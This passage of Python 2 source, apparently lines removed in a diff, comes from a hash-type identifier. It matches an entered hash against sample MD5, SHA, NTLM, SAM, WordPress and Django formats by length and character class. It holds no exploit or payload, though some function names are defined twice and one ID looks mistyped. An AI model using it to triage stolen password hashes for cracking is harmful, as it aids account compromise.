"106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); 